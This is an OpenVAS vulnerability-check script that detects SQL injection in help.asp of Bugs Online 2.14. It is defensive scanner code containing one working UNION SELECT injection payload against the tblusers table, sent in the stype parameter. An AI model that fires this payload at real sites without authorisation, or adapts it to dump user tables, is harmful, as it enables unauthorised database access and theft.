###############################################################################
# OpenVAS Vulnerability Test
# $Id: bugs_online_sql_injection.nasl 130 2009-03-15 14:10:21Z mime $
#
# Bugs Online 'help.asp' SQL Injection Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100051);
 script_bugtraq_id(33539);
 script_version ("1.0");

 script_name(english:"Bugs Online 'help.asp' SQL Injection Vulnerability");
 desc["english"] = "

 Overview:
  Bugs Online is prone to an SQL-injection vulnerability because it
  fails to sufficiently sanitize user-supplied data before using it in
  an SQL query.

  Exploiting this issue could allow an attacker to compromise the
  application, access or modify data, or exploit latent
  vulnerabilities in the underlying database.

  Bugs Online 2.14 is vulnerable; other versions may also be affected. 

 See also:
  http://www.securityfocus.com/bid/33539

 Risk factor : Medium";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if Bugs Online 'help.asp' is vulnerable to SQL Injection");
 script_category(ACT_GATHER_INFO);
 script_family(english:"Web application abuses");
 script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_asp(port:port))exit(0);

dir = make_list(cgi_dirs());
foreach d (dir)
{ 
 url = string(d, "/help.asp?stype=-999'%20union%20select%201,2,'OpenVAS-SQL-Injection-Test'%20from%20tblusers%20where%20'1");
 req = http_get(item:url, port:port);
 buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
 if( buf == NULL )continue;

 if( 
     egrep(pattern: "^OpenVAS-SQL-Injection-Test.*", string: buf)
   )
   {    
    security_warning(port:port);
    exit(0);
   }
}
exit(0);
